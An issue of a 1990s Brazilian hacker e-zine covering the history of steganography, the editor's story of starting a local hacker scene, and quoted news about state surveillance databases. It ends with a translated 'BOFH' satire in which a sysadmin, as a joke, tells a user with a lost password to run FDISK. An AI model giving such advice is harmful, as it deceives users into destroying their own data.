servico de inteligencia so' dedicado a abrir e vistoriar correspondencia
entrando e saindo do pais. Todas as cartas, telegramas eram abertos.
Tradutores para quaisquer linguas conhecidas eram requisitados, para se
descobrir possiveis espioes. Fotos, desenhos, mesmo feitos por criancas,
eram sumariamente "apreendidos". Isso porque um desenho tambem pode
esconder informacao, vide o exemplo do fundador do escotismo (durante seu
tempo a servico da coroa britanica, antes da primeira guerra), Badden
Powell, fez todo um mapa de fortificacoes alemas disfarcado de desenho de
borboletas (o disfarce dele era de "cacador de borboletas").
Qualquer carta contendo algo estranho, ou informacao fora do comum
era "atrasada" ate' se ter certeza do conteudo inofensivo. Uma piada da
epoca fala que um dos encarregados da censura desconfiou de um telegrama do
tipo "papai morreu". Alterou e enviou outro, com o conteudo: "papai
faleceu". Ai' o destinatario replicou com a mensagem "papai morreu ou
faleceu?".
Tudo isso e ainda assim era e e' complicado. A Alemanha desenvolveu
um "kit" de fotografia, capaz de reduzir o negativo de uma foto ate' o
tamanho de um alfinete, os chamados "micro-pontos". Isso antes de 1939.
Durante a guerra, ha' noticia de na propria Alemanha (durante o periodo
nazista), a literatura denominada "subversiva" (livros considerados
"decadentes" por serem de autores judeus ou contra o regime nazista) eram
reduzidos fotograficamente e contrabandeados em saquinhos de fermento.
Dentro dessa briga entre censoresXespioes havia tambem toda uma grande
gama de tintas "invisiveis" para quem le, mas que com os reagentes
adequados, tornam-se visiveis para o destinatario da mensagem. Coisa De
crianca, tipo usar uma pEna para escrever com sumo de limao ou outra fruta
citrica e esquentaR delicadameNte o papel dEpois, para ver a mensagem
aparecer. A coisa chegaVa ao ponto de se inserir mensagens dentro de uma
folha de papel, a semelhAnca daquela tirinha que existe para diferenciar
notas faLsas de verdadeiras.
E' um assunto bem vasto. Ha' inumeras formas de se esconder texto
dentro de texto. O unico problema e' que se precisa de um volume enorme
de caracteres p. que um pequeno volume passe despercebido. Por exemplo, no
paragrafo anterior, ta' o meu nome escondido, basta procurar pelas
maiusculas que estao fora de lugar, logo depois da palavra "mensagem".
O hit atual da esteganografia e' a ocultacao de mensagens em fotos.
Pra usar um palavriado mais tecnico: uma foto e' um arquivo binario, com
uma quantidade enorme de bits, donde a alteracao de um pequeno numero nao
aparece. Uma imagem comum de 8 bits, 256 cores, usa 8 bits para representar
um pixel ou elemento de gravura digitalizada, sendo que ha' imagens de 32
bits que permitem milhares ou milhoes de cores. Uma imagem digital de 8
bits 480 por 100 em teoria pode ter 5000 caracteres de texto dentro e pode
ser criptografada com pgp pra ficar mais segura ainda, embora metodos de
"procura" ja' tenham sido desenvolvidos para achar estas mensagens
escondidas (dados "sugados" de um URL esquecido).
Existem varios softwares na rede que possibilitam esconder arquivos em
imagens .GIF, .JPG e .BMP . Nenhum dos quais ideais para este tipo de uso,
mas de qualquer forma, podem quebrar um galho. Apesar de que a imagem fica
alterada e em alguns casos, distingue-se o lance. Aumenta o arquivo
horrores.
O mesmo pode ser feito com transmissoes de video e de audio que agora
sao o hit de paginas na Web. Um exemplo para fotos gif pode ser encontrado
na pagina de Romana Machado, autora (ate' gostosa, por sinal) do Stego for
Mac, um programa feito para Mac porem disponivel para Java, que permite
inserir texto em gifs, no http://www.fqa.com/romana . Embora este tipo de
mensagem tenha sua utilidade, e' um segredo como qualquer outro. Uma vez
suspeitado, pode ser ate' mais perigoso, ja' que o excesso de confianca
pode facilitar a "escuta" de mensagens, no que e' chamado pelos alemaes de
"funkspiel". A esteganographia ou ocultacao de mensagem so' e' realmente
util quando nao se suspeita dela.
HISTORIA RESUMIDA DO BARATA ELETRICA ou
COMO COMECAR UMA CENA HACKER
============================
Artigo publicado na edicao Summer96 da revista 2600 - Hacker Quaterly
Minha Autoria - minha traducao - tudo isso abaixo e' material que ja'
comentei em numeros anteriores, mas este e' o texto integral, que saiu numa
publicacao estrangeira, que e' referencia pro Computer Underground do mundo
inteiro, alem de me render uma conta internet, a curupira@2600.com. Alem
disso, acho que os caras gostaram tanto que o Barata Eletrica tambem esta'
disponivel la' no ftp.2600.com. O que esta' entre parenteses, obvio, nao
saiu no texto original, mas acrescentei por uma questao de "pingos nos iis"
Tudo comecou em Outubro de 94. Havia o "Hackers and Virus Writers Congress"
na Argentina, e foi o primeiro encontro do seu tipo na America do Sul.
Minha experiencia com a internet e minha sede por conhecimentos
relacionados a virsu me levou ate' la'. Eu tinha cerca de oito anos de
manuseio de computadores e muito pouca sabedoria das coisas acontecendo em
outros lugares. Qual a surpresa de encontrar uma cena hacker la'. No
Brazil, do qual falei num artigo anterior, os grupos que faziam esse tipo
de coisa nunca divulgavam seus conhecimentos. Os hackers argentinos tinham
sua propria revista "Virus Report" e cerca de quatro ou cinco e-zines,
todos eles lidando com a escrita de virus e alguns outros assuntos. Eles
tambem tinham encontros 2600 (tipo de encontro de hackers toda primeira
sexta-feira de cada mes).
Quando voltei para Sao Paulo, ainda maravilhado pelo que vi no
Congresso, eu disse a meus amigos no trabalho a respeito e alguns deles,
gente ate'importante, pensaram que formar um congresso de hackers aqui
poderia ser uma boa coisa, se pudesse ser um encontro positivo. Minha turma
nao tava mais por ai'. O lugar onde costumavamos nos encontrar, o
laboratorio de Computacao da Escola Politecnica, foi substituido e os
rapazes arrumaram bons empregos e foram substituidos por novos
frequentadores, nenhum dos quais me conhecia. Eu tentei fazer contato e
descobri que, sim, eles tinham um tipo de organizacao propria, tambem
tinham acesso internet, mas nao, nao tinham nem o tempo nem a vontade de
explorar tudo. O especialista em virus com quem conversei sabia varios
truques, mas nao tinha o conhecimento da situacao la' fora, nem os arquivos
sobre a fabrica de virus Bulgara ou o AIDS trojan. Nada. Eles tinham
bastante experiencia pratica. Cada um tinha algo no qual resolveram
trabalhar, mas nao muito a fundo. Muitos poucos no meu pais podem ler
ingles o bastante para ler todos os e-zines como o PHRACK. A pior coisa
e' que eu fiz o meu "contato" assim meio do nada, sem muito o que mostrar
nem pedindo por conhecimento. Um ano surfando na rede (via linha dedicada)
foi muito ruim pra mim, em termos de sociabilidade. Os caras so' confiaram
em mim mais ou menos. Nada alem disso. Nao copiariam os discos com
informacaoes que preparei para elesnem iriam partilhar seus conhecimentos
comigo - so' uns bytes aqui e ali (alias, ate' hoje isso nao mudou - nota).
Fizeram ate' um talker, o primeiro do Brasil (carpa.ciagri.usp.br - hoje
sei la' o que ta' rolando - ainda to^ meio p(*) c/ um dos caras q. montou
o lance:"enrolou" que ia escrever sobre o assunto e e' por isso que o nome
dele nao aparece - maldade), que poderia ter sido uma janela p. fazer mais
contato, mas decidi por uma outra forma de contato. Eu pensei que seria
necessario "educar" os novos integrantes, de forma que eles pelo menos
partilhariam alguma coisa de etica e de mentalidade hacker. Muitos nao nao
compreendem a importancia de tracar uma linha entre o que e' certo e o que
e' errado. A imprensa nao publicaria artigos mostrando meus pontos de vista
sobre o assunto porque (naquela epoca) muito pouca gente sabia sobre
aquilo. E a preparacao para tal congresso demandaria muita cobertura da
imprensa.
Eu comecei fazendo uma lista de correspondencia manual. As pessoas me
mandariam cartas pedindo para entrar na lista e entrariam para um "alias"
(ou lista) e eu enviaria um ou dois arquivos por dia. Apenas dicas sobre
como encontrar isso ou aquilo e um arquivo ou outro sobre acontecimentos
envolvendo hacking. Ate'comecei a por um anuncio no newsgroup
soc.culture.brazil. Mais tarde, fiquei sabendo da esquina-das-listas e
montei a lista "hackers" la'. E por volta da mesma epoca convidei a
"rataiada" para comecar um encontro.
Planejei igualmente um pequeno informativo para passar as dicas, de
forma a nao ter que repetir coisas como: "Porque estou fazendo isso", "O
que e' hacking", etc . O nome era importante (hoje ja' nao acho tanto). O
unico que "pegou" foi Barata Eletrica. Meu chefe, entre todos, foi o unico
que pegou de cara o significado. Me perguntou: "Porque nao algo que fosse
acima da terra?". Fiz 100 % sozinho.(Pedi a colaboracao da mocada, que
repetiu o que repete ate' hoje: "To com prova, tenho trabalho pra entregar,
esta semana ta' cheia, nao sei fazer") O primeiro numero foi sobre algumas
coisas que achava que deveriam ser de conhecimento comum como definicao de
hacking, qual era o meu objetivo, como e porque estava fazendo isso, etc..
Um fa~ da revista Phrack nao leria isso, com certeza. Foi provavelmente o
primeiro fanzine em lingua portuguesa publicado na Internet. Naqueles dias,
os jornais falavam sobre a rede, mas nao era ainda coisa disponivel fora
das universidades (pra se ter uma ideia, modem de 2400 era o comum). A
pessoa tinha que estar envolvida com um projeto de pesquisa para conseguir
o acesso ou aceitar um email comercial via UUCP. Compuserve era qualquer
coisa quase desconhecida (hoje ouvi falar que ja' existe - do meu ponto de
vista, infelizmente). As pessoas tinham que me mandar email para receber o
fanzine. O primeiro foi completado em cima da hora porcausa do "provavel"
encontro ao qual poucos, bem poucos compareceram. Me deixou meio
desapontado. Mas o pior aconteceu um tempo depois.
Ninguem da Administracao tinha se incomodado com a minha lista
informal, nem com a lista "hackers" ou mesmo o fanzine em si. Mas ai' eu
dei a dica para um jornal (Folha de Sao Paulo, Coluna NETVOX, a segunda ou
terceira vez que tal coluna apareceu, se nao me engano). As pessoas ouviram
falar da minha lista depois disso. Destino ou nao, tava usando a camiseta
da revista 2600 - Hacker Quaterly nas duas ocasioes - no dia em que a dica
apareceu no jornal e no dia em que a administracao me chamou (de uma forma
simples, suspendendo minha conta) para perguntar sobre a minha lista. Nao
que nao me conhecessem. Eu ERA um dos caras com o maior numero de horas
usando a rede na Universidade de Sao Paulo (simples: o laboratorio de
computacao ficava aberto a noite inteira, acesso via linha dedicada, era
muito comum eu entrar meio-dia e sair as 7:00.. da manha do dia seguinte).
Muito bom o fato de que nao podiam me acusar de tentar advinhar a senha de
root.
As pesssoas eram paranoicas naquela epoca. Mas apesar de estar usando
uma camiseta da 2600 com uma blue box estampada, (sim, tambem acharam muito
ironico), apenas me disseram para nao usar os computadores da Universidade
como veiculo de transmissao. Nunca mais. Foi duro. Mas mais tarde, isso
acabou virando a melhor coisa que poderiam ter me pedido. (Eu estava com
preguica) Isso me forcou a procurar por um site ftp (naquele tempo nao
havia essa de geocities, internet comercial era novidade ate' nos EUA, voce
tinha que pedir para que algum lugar aceitasse colocar seu material
disponivel para ftp ou gopher, acho que o comum era achar netscape na
versao 0.98, so' pra referencia). De todos os lugares, tentei pedir para a
EFF - Electronic Frontier Foundation. O mesmo lugar de onde eu tinha feito
download de tudo quanto e'coisa, horas a fio. Para minha surpresa,
aceitaram. Me salvou muitas horas, mandando o Barata Eletrica por email
para uma conta internet Freenet (saudade das BBS internet..) e depois
mandando via email para 80 pessoas no Brasil (a conta ficava na Alemanha,
as vezes demorava dez segundos para as letras aparecerem na tela). Sempre
havia gente nova ouvindo sobre meu fanzine. Eu ate' fiz um programa que
fazia a mala-direta de forma automatica. Mas mesmo assim, eram quatro ou
cinco horas de trabalho para mandar um novo numero do fanzine para todo
mundo que pedia.
Mais tarde a Universidade Federal de Santa Catarina concordou em
colocar o zine no seu URL (onde esta ate' hoje). Pena que nao era em html.
E outra universidade (ftp.ufba.br - valeu sluiz) pos no seu site ftp. Os
participantes da lista "hackers" fora da minha Universidade cresceram ate'
o numero de 200 e mais importante, um cara me pediu para ajudar num artigo
sobre hackers para a revista SUPER INTERESSANTE (Materia do Heitor e do
Ricardo). Havia ate' mesmo uma foto minha e o URL do meu fanzine. A boa
coisa e' que o reporter realmente entendeu meu ponto de vista e o artigo
nao colocou os hackers como um tipo de inimigo publico.
A midia, a maior parte do tempo, nao se preocupa em aprender sobre um
assunto qualquer. Eles constroem em cima de algo que alguem escreveu sobre
isso anteriormente. Uma boa coisa sobre o meu e-zine e'que ele continha
dados que ajudaram alguns reporteres a escreverem sobre esse assunto.
Quando um cara foi pego na Universidade de Pernambuco, a revista VEJA nao
chamou ele de hacker, mas de pirata do computador. Em outros dois break-
ins, a mesma coisa aconteceu. Os caras ate' colocaram uma diferenca entre
"hacker" e "dark-side-hacker", a mesma diferenca estressada no meu fanzine.
Me disseram que por causa do meu fanzine, seria sempre banido de
conseguir acesso de super-usuario (como acontece normalmente, o cara
resolve te aproveitar) legalmente, mesmo no meu lugar de trabalho. Os caras
na administracao estavam paranoicos a meu respeito. Nao interessava se meu
zine estava sendo imitado por outros caras em outras universidades, alguns
ate' pedindo ajuda.
Hoje (e'poca em que escrevi isso, inicio de 96) ha' outro cara tambem
fazendo um hacker zine, muito mais agressivo do que o meu (era o hack.br).
A lista "hackers" alcancou 600 pessoas (na epoca em que escrevi era a
terceira em numero e se nao fosse um defeito que fazia o software da lista
apagar aleatoriamente inscritos, seria talvez a primeira). As pessoas estao
apenas comecando a aprender sobre o assunto. Quase toda semana, alguem me
pede para ensinar como usar o SATAN ou algum tipo de software de cracking.
Outros me pedem algo mais complicado, como ser seu guru ou mestre. A
maioria dos que pedem estao entre os 14 e 19 anos de idade. Uma vez que
meus artigos falam de como e' dificil fazer isso sozinho, as pessoas
oferecem ajuda e o fanzine esta sendo distribuido em tudo quanto e' lugar.
Mesmo a BBS do lugar onde eu trabalho me pediu permissao para colocar la'
(coisa que a Administracao tinha me pedido pra nao fazer). Este sucesso e'
algo que ainda nao entendi direito.
Para escrever os artigos, tive que deixar de hackear, tanto por falta
de tempo como por seguranca. Os artigos, por sinal, sempre bem simples,
para evitar qualquer tipo de problemas legais. Eu fiz a besteira de usar o
meu proprio nome, ao inves de um apelido. Tentei outra vez organizar o
pessoal num boteco e (pra evitar excesso de lammers) ia informar a tchurma
do local e hora pela internet. A Administracao tava de olho e resolveu
"suspender" minha conta exatamente ha' dois dias desse novo encontro e a
coisa melou. Nao aconteceu porque nao pude enviar os detalhes. A ultima
coisa que aconteceu (na epoca q escrevi isso) foi a traducao do livro
"Hacker Crackdown" do Bruce Sterling. Tava juntando gente via email, para
traduzir parte por parte o livro. Cada um iria traduzir cinco ou dez
paginas para o portugues. Um dia, minha conta foi craqueada e reclamei pros
caras da administracao. Para mim, so' podia ser o trabalho de alguem com
status de Super-Usuario ou administrador.
Eles foram checar os arquivos na minha conta. Meu nome ja' estava na
lista negra, desnecessario dizer. Quando o cara que checou a coisa
encontrou o arquivo de nome "crac.gz", ele nao se incomodou em checar o que
tinha dentro. Ao inves, a conta foi bloqueada. E mais tarde, uma mulher
(loira tingida) veio me avisar que o unico jeito de conseguir que minha
conta "voltasse" seria abrir, entre testemunhas, aquele arquivo especifico
(lembro ate' hoje as palavras: "o sistema deve ser protegido" - mais tarde
a coisa mudou um pouco). Eles pediram para mim escrever num papel "la
raison d'etre" do arquivo. Assinado, ponto. Um cara da alta administracao
iria checar e me devolver o uso da conta. Um dia desses, talvez num mes (na
verdade, levou tres meses e alguns dias, tinha dez megabytes de email e um
especifico falando que minha caixa de email estava lotada e eu ia perder
tudo se nao limpasse).
Eu ganhei uma verdadeira turma de admiradores de hackers de todo o
Brasil (talvez ate' alguns peritos de verdade) e (quase) perdi meu acesso
internet (do qual dependia e depende meu trabalho ate' hoje). E' algo a se
falar.
Aviso aos navegantes, entao: Se voce esta' pensando a respeito de
armar uma cena hacker no seu pais (a revista 2600 e' ponto de referencia em
tudo quanto e' canto do mundo), nao faca isso sozinho. Informe-se sobre a
legislacao (no caso do Brasil, vai cair uma pesadissima, me falaram).
Sempre ajuda. Use quaisquer listas disponiveis e facam-nas funcionarem para
voces. Planeje uma linha de acao. E' um processo que nao pode ser
apressado. Armazenae o email que voce receber, mas criptografe tudo. Use a
imprensa comum, quando disponivel. Tente fazer amigos entre os reporteres
(coisa as vezes dificil). Use talkers, IRC e ate' mesmo telefone para fazer
contatos. Eu usei apenas correio eletronico e um fanzine hacker. Nao e' o
bastante. Se voce tiver problemas, divulgue. Isso nao vai piorar a coisa.
Tente escrever bons artigos (pelo menos algo que consiga reler). Se usar
fontes estrangeiras, tenha certeza de que entendeu o que leu. Nao pense
que pode fazer dinheiro com isso so' porque ficou famoso (isso e' talvez a
maior ilusao). Tente (porem) manter seu emprego, sua formatura (graduacao
ou pos) e seus amigos. Ira' (com certeza) precisar deles alguma vez no
futuro. Se sua conta for "congelada", nao chore. Tenha outra pra
substituir. E acima de tudo, nao perca a esperanca. A coisa e' distribuir a
semente. O resto e' uma questao de tempo.
ADENDO: Atualmente, ja' consegui um trabalho ajudando a montar um servidor
internet (anonimamente). Tem um encontro 2600 rolando em Belo Horizonte,
perto de um lugar chamado Pelego's Bar (nao perguntem que nao sei onde
fica). Tinha um no RJ, mas saiu fora da lista do 2600 - Hacker Quaterly. O
local onde eu ia tentar de novo montar a reuniao de hackers mensal foi
posto a venda recentemente. O congresso internacional de hackers ainda e'
projeto. E' muito dificil tirar os caras do computador aqui em Sao Paulo.
Tudo e' muito longe. O cara fala que vai e nao aparece nem fala que nao vai
aparecer. Varios clubes de hackers estao rolando pela rede. Lotados, ja'.
Existe a lista fussadores, mas tambem dificil de entrar e lotadassa. Os
maiores problemas sao excesso de gente querendo se enturmar para aprender
besteira (so' o minimo necessario para se chamar de hacker) ou falta de
tempo da mocada mais capacitada. Parece que vai rolar uns encontros por ai'
de mocadas de BBSes underground, mas nao estou por dentro. Como nao acesso
nada fora da Internet, so' se alguem me fornecer informacao vou me inteirar
disso, o que nao quer dizer que o Brasil inteiro, atraves do BE va' ficar
sabendo. Ta' assustando a quantidade de gente que quer se enturmar so' pra
falar que e' hacker. So' pra falar que e'. Como se fosse necessario...
Parece que tao rolando uns zines novos por ai'. Mas como sao de
caracteriscas proprias e nao pediram nenhuma especie de divulgacao, fazer
o que? O Barata Eletrica ta' tao difundido, tao praga em tudo quanto e' BBS
da vida, que nao pode ser realmente chamado de uma publicacao underground,
no sentido da palavra. Existem BBSes (nao internet) como a Medusa e outras,
que sao responsaveis por nucleos nacionais de distribuicao de fanzines de
virus (um tipo de publicacao que ta' ficando mais popular e que tambem ate'
engloba hacking). Mas divulgar significa lotar ainda mais umas poucas
linhas telefonicas que o BBS nem sempre tem.(E tambem, dependendo do caso,
submeter o dono da linha telefonica a algum tipo de perseguicao. Nao pensem
que isso dai' nao acontece nem que nao esta' sendo vigiado, porque esta').
E tem o lance de propaganda gratuita que nao e' legal fazer se o produto
nao for tambem gratuito.
Em alguns casos, se a BBS estivesse afim de aparecer, ela propria
faria uma publicacao. Alguns fanzines como o NUKE, ou a PHRACK comecaram
como uma forma de difundir a BBS underground do grupo. Um detalhe e' que no
caso da PHRACK a informacao que a revista continha varias vezes era falsa
ou incompleta. Isso e' comum pacas. O cara e' que tinha que se virar para
completar a parte que faltava. E as informacoes realmente interessantes, se
desatualizam rapidamente. Dai' a utilidade de listas como a lista
"hackers". Nada impede que novos clubes de hackers sejam criados para
intercambio de informacao. So' alguns por enquanto descobriram essa ideia,
de criar suas proprias "panelinhas". Quando houver clubes suficientes,
talvez as pessoas comecem a se reunir em locais, da mesma forma que se
reunem em chats da UOL e IRC, que pelo que ouvi falar e' o que mais
acontece.
A traducao do livro Hacker Crackdown ainda vai rolar, assim como vai
rolar o meu projeto de uma conferencia aqui no Brasil. Os convidados
estrangeiros, isso ta' quase certo. Os brasileiros ainda sao uma duvida.
O meu chefe ainda tem interesse no assunto, faltam apenas rolar varios
detalhes. Meu maior medo e' montar isso sem ter certeza de publico, como
rolou nos encontros. Quem tiver interesse, fique ligado na lista hackers.
O dia que rolar, vai aparecer a noticia la'.
PARA A SUA PROTECAO: GRANDE IRMAO ESTA' VINDO..
===============================================
New Number 2- "INFORMATION, WE WANT INFORMATION"
The Prisoner- "WHO ARE YOU?"
NN2 - "THE NEW NUMBER 2"
TP - "WHO'S NUMBER ONE?"
NN2 - "YOU ARE NUMBER SIX"
TP - "I AM NOT A NUMBER, I AM A FREE MAN!!!"
NN2 - "HA! HA! HA!"
O trecho acima foi tirado do seriado "O Prisioneiro" e inserido numa
cancao do grupo de heavy metal "IRON MAIDEN". E' tao antigo esse seriado
que nem assisti (do tempo em que o Jo Soares era magro). O que eu soube
seriado, o sujeito era sempre preso e interrogado por nao se sabe quem nem
sobre o que (os caras nao queriam dar qualquer tipo de informacao, so'
receber). Um pouco pior do que "O Processo" de Kafka. Mas como se viu em
Diadema, no nosso pais, a ficcao ta' muito aquem da realidade. O cara la'
foi morto so' porque apareceu no lugar errado, na hora errada. Isso nao
acontece so' aqui, obvio. Mas nao e' consolo.
Algumas noticias tiradas dos jornais ESTADO DE SAO PAULO e ZERO HORA. Acho
que todo mundo devia prestar mais atencao no jornal. Infelizmente por falta
de grana, tive que cancelar a assinatura. Mas durante o periodo em que fui
leitor regular, peguei algumas perolas que lembram um pouco aquele livro do
George Orwell, "1984". Num pais que ja' teve 8(?) Constituicoes, sei la'
quantas ditaduras e casos como os de Diadema (o tipo de coisa que ja' ouvi
muito antes e ate' da boca de turista argentino), as pessoas deixam passar
noticias tao importantes e pior: nao fazem nada, nao sabem de nada.
Perder os sentidos num hospital qualquer hoje pode ser o inicio de uma
doacao de orgaos, por exemplo. Talvez sob pretexto de combater o trafico de
drogas e outros crimes, baixem uma lei obrigando a tatuacao de um numero de
registro no braco.
Who knows? Ia colocar, mas perdi recorte de uma reportagem comentando
que algumas escolas do primeiro e segundo graus estavam testando um cartao
eletronico que possibilitava aos pais saberem o que seus filhos estavam
comendo no intervalo das aulas. Ja' nao basta que a crianca que entrar na
escola receba um numero de RG. Cada gasto dos alunos (que estariam usando
o tal cartao) ficava registrado no chip e depois essa informacao podia ser
debitada na conta do pai ou coisa do genero. Em outras palavras, o garoto
pede um refrigerante, chega em casa, o pai da' aquela bronca porque acha um
absurdo gastar dinheiro com porcarias. E', de menino que se torce o pepino.
Quando adulto, esse menino nao vai ficar surpreso se toda sua conta
bancaria for monitorada pela empresa, que quer saber se ele ta' gastando
grana com coisas saudaveis ou de repente ta' planejando algo, tipo um
desfalque, p. pagar as dividas.. deve ficar mais facil negar um aumento
quando se sabe que o funcionario ta' bem de vida.
As pessoas podem ate' me achar paranoico, viajando na maionese. Mas na
Inglaterra, uma lei que permitia ao cidadao saber o que o governo sabia
sobre ele foi alterada. O cara so' recebe isso meses depois. As empresas,
ao contratar gente, "pediam" aos candidatos a determinado emprego, que
"fornecessem" tal papel, alem do Curriculum Vitae. Na pratica, seria o
Servico Secreto checando se o cara era tudo aquilo que dizia. Com um
adendo: um sujeito do Servico Secreto e' um funcionario publico tentando
achar uma "conspiracao" pra provar que merece sair do servico de rua. Donde
se pode imaginar qe coisas do tipo "namorada do PT" poderia virar "ligacoes
com a esquerda". Como o pessoal na Inglaterra se revoltou, fizeram um
periodo de espera de alguns meses entre o pedido do tal "dossier" e a
entrega. Detalhe: la' eles parece que implantaram um sistema de informacao
digital sobre cada cidadao, como pretexto p. combater o terrorismo. E' mais
facil invadir a privacidade de todo mundo do que sair da Irlanda do Norte,
parece. E ai' fica aquele bando de caras, que achavam que iam ser "James
Bond", vigiando a amante do diretor, aquele filho do deputado ou mesmo um
cara qualquer que se encaixa no perfil de ameaca ao trono ingles.
Ai' acontece qualquer coisa e algum tempo depois um filme chamado "Em
Nome do Pai", aparece e faz sucesso nas bilheterias.
Se isso nao te assusta, imagina entao que e' praxe no Brasill
organizar uma reforma qualquer e usar o modelo de um pais mais
desenvolvido, leia-se inclusive a Inglaterra, como exemplo. Entao, PODE
ACONTECER COM VOCE.
REDE DE INFORMACOES INTEGRARA' POLICIAS DO PAIS (23-01-97 pg C11)
Sao Paulo e Rio Grande do Sul testam desde ontem Infoseg, que permite
localizar criminosos.
Brasilia - Desde ontem, a policia esta' testando o Programa Nacional das
Informacoes de Justica e Seguranca Publica (Infoseg), instalado pelo
Ministerio da Justica para localizar, com mais rapidez, criminosos em todo
o Pais. Interligado a uma central na Policia Federal, o projeto tambem
esta' funcionando no Rio Grande do Sul. O acesso aos dados usa o mesmo
sistema da Internet, com um circuito privado que sera' instalado nos
Estados.
A policia paulista tera' disponivel informacoes de 4,6 milhoes de
pessoas cadastradas pelas Secretarias de Seguranca Publica de todo o Pais.
(Nota do Barata Eletrica: Essas secretarias sao os orgaos responsaveis pela
emissao do RG de cada cidadao) "Se uma pessoa e' presa no Acre, por
exemplo, todas as suas informacoes serao repassadas para o banco de dados
da policia paulista e da Policia Federal", explica o diretor do
departamento de Acoes de Seguranca Publica, general Dyonelio Morosini. O
sistema ainda sera' adotado no Poder Judiciario e penitenciarias.
A policia paulista tambem contara' com dados sobre carros roubados,
pessoas desaparecidas, armas de fogo, fotos e impressoes digitais, crimes,
inqueritos e mandados de prisao.(EDSON LUIZ)
TRECHOS DO PRONUNCIAMENTO NO PROGRAMA DE RADIO "PALAVRA DO PRESIDENTE"
(28-1-97 - copiado do Jornal ESTADO DE SP - pg C6)
"A nossa meta para 97 e' reunir informacoes criminais, para colocar a
disposicao das autoridades que cuidam da seguranca.
Nos acabamos de lancar o projeto piloto do Programa de Integracao
Nacional das Informacoes de Justica e Seguranca Publica, o Infoseg. Este
programa reune, em um so' banco de dados, todas as informacoes criminais
das Policias Federal, Civil e Militar, do Ministerio Publico, do Judiciario
e do Sistema Penitenciario de cada Estado. Isso significa que, se um
delegado prender uma pessoa no interior de um determinado Estado pode
buscar informacoes sobre ela e saber se ja' cometeu algum crime em outro
Estado, se e' procurada pela policia, se responde a algum processo.
Um juiz, ao examinar os processos, tambem podera' entrar no sistema e
conseguir a ficha completa do criminoso. Os procuradores que pretenderem
apresentar denuncia, tambem conhecerao todas as acusacoes que pesam sobre
aquele cidadao em qualquer parte do Pais.
Em resumo, a integracao vai facilitar o trabalho da policia e da
Justica na perseguicao aos criminosos que mudam de Estado a toda hora.
Nesta primeira fase, o Infoseg vai integrar 4,6 milhoes de informacoes
da Policia Federal do Rio Grande do Sul e de Sao Paulo. [..] Ja' repassamos
recursos para 25 Estados iniciarem a adocao do projeto. Queremos entregar
todas as unidades da federacao ate' o fim do ano que vem.
[...]
Outro instrumento que vai facilitar e dar mais seguranca e' o Registro
Civil Unico. O projeto de autoria do senador Pedro Simon preve que cada
brasileiro tera' apenas um numero, ao inves de 21 como e' hoje, para
identidade, titulo de eleitor, etc.. A diversidade de numeros tem
facilitado a acao de criminosos, como e' o caso dos portadores de
identidades falsas. O projeto foi aprovado no Senado e espero que em breve
a Camara o aprove tambem, para que eu possa sancionar essa lei que sera'
mais um instrumento a favor de nossa seguranca."
---------------------
BRASILEIROS TERAO 5 ANOS PARA OBTER REGISTRO UNICO (9/4/97)
Os atuais documentos, como carteira de identidade, vao perder a validade
apos esse prazo
BRASILIA - Os brasileiros terao cinco anos para se recadrastar e obter o
registro civil unico. A partir dai' os atuais documentos, como a carteira
de identidade, perdem a validade. Ja' o governo federal tera' seis meses
para apresentar as normas para a criacao do registro unico e mais um ano
para montar a maquina que o substitua. A Lei 9.454, que criou o novo
documento, foi sancionada anteontem, com vetos, pelo presidente Fernando
Henrique Cardoso.
Fernando Henrique vetou o paragrafo unico e os tres incisos do projeto
aprovado pelo Congresso, que tracavam regras para a composicao do numero.
--------------------------
RECEITA QUER LEI PARA INTERCAMBIO DE SIGILO (28/3/97) pg a6
BRASILIA - O secretario da Receita Federal, Everardo Maciel informou ontem
que ja' esta' trabalhando em um projeto de lei complementar para permitir a
troca de informacoes protegidas por sigilo bancario e fiscal entre Receita
Federal, Banco Central e outras entidades de fiscalizacao do governo. Hoje,
a Receita tem acesso apenas ao sigilo fiscal e o Banco Central, ao sigilo
bancario. A troca de informacoes so' e' possivel em condicoes excepcionais,
como quando uma CPI aprova a quebra de sigilo de pessoas sob investigacao.
----------------------
POLICIA INVESTIGA VENDA DE DROGAS PELA INTERNET - 7/03/97 pg C7
Possiveis traficantes e compradores discutem qualidade e preco de
entorpecentes em conversas "on-line", em que a identificacao das pessoas e'
muito dificil de ser checada (Silvia Barsetti)
A policia fluminense investiga denuncias de que traficantes do Rio
estariam usando a Internet, a maior rede de comunicacao do mundo, para a
venda de drogas. [..] Os indicios estao sendo levantados por meio de
consultas on-line no chat - sistema que permite bate-papo em tempo real e
no qual a identificacao e' muito dificil de ser checada.
----------------------
ZERO HORA - 25/10/96 - caderno de informatica
COMPUTADORES SOB SUSPEITA - Policiais se especializam na investigacao de
operacoes eletronicas
A Policia Federal esta' organizando um grupo para invadir computadores e
descobrir detalhes de operacoes suspeitas. O Grupo Especial de Busca e
Analise de Computadores (Gebac) e' formado por experts em informatica.
Sem previsao para comecar a operar, o Gebac esta' sendo treinado por
especialistas na Australia, Canada' e Estados Unidos. Enquanto nao ha'
solucao local para casos de escuta eletronica, a Policia Federal se vale de
um acordo de cooperacao com autoridades estrangeiras. Antonio Augusto
Araujo, diretor do Instituto Nacional de Criminalistica, diz que quando for
necessario sera' solicitada a ajuda da policia dos Estados Unidos, o
Federal Bureau de Investigacao (FBI) ou do servico de inteligencia daquele
pais, a Central Intelligence Agency (CIA).
No Brasil, a quebra do sigilo eletronico esta' regulamentada pela Lei
9.296 de 24 de julho de 1996. Criada para os casos de escuta telefonica,
tambem se aplica a interceptacao de fluxo de comunicacao em sistemas de
informatica e telematica. A pena prevista e' de dois a quatro anos de
prisao e multa. Desde a sua regulamentacao, nao se tem registro de que a
lei tenha sido aplicada a hackers.
[..]
Enquanto o Gebac nao entra em campo, a PF conta com acordos e
parcerias com os policiais dos Estados para vasculhar os computadores de
pessoas ou operacoes suspeitas. A Secretaria da Justica e Seguranca Publica
do Rio Grande do Sul ja' esta' preparada para a utilizacao desta tecnologia
em operacoes policiais.[..]"Normalmente recorremos a UFRGS quando existe a
necessidade de obter dados mais precisos", afirma a diretora de Divisao de
Pericias da Capital, Maria Cristina Farias.
----------------------
UMA SEMANA NA VIDA DO ADMINISTRADOR DE SUPORTE DO INFERNO
=========================================================
(Traduzido do original por Fabricio A. M. de um texto americano meio
famoso. Qualquer semelhanca e' mera coincidencia. O texto e' humor, pra
quem nao pegou o espirito da coisa. Nao e' pra sair imitando)
Segunda
8:05am
Usuario chama dizendo que perdeu a password.
Eu disse a ele para usar um utilitario de recuperacao de senhas chamado
FDISK. Ignorante, ele me agradecu e desligou.
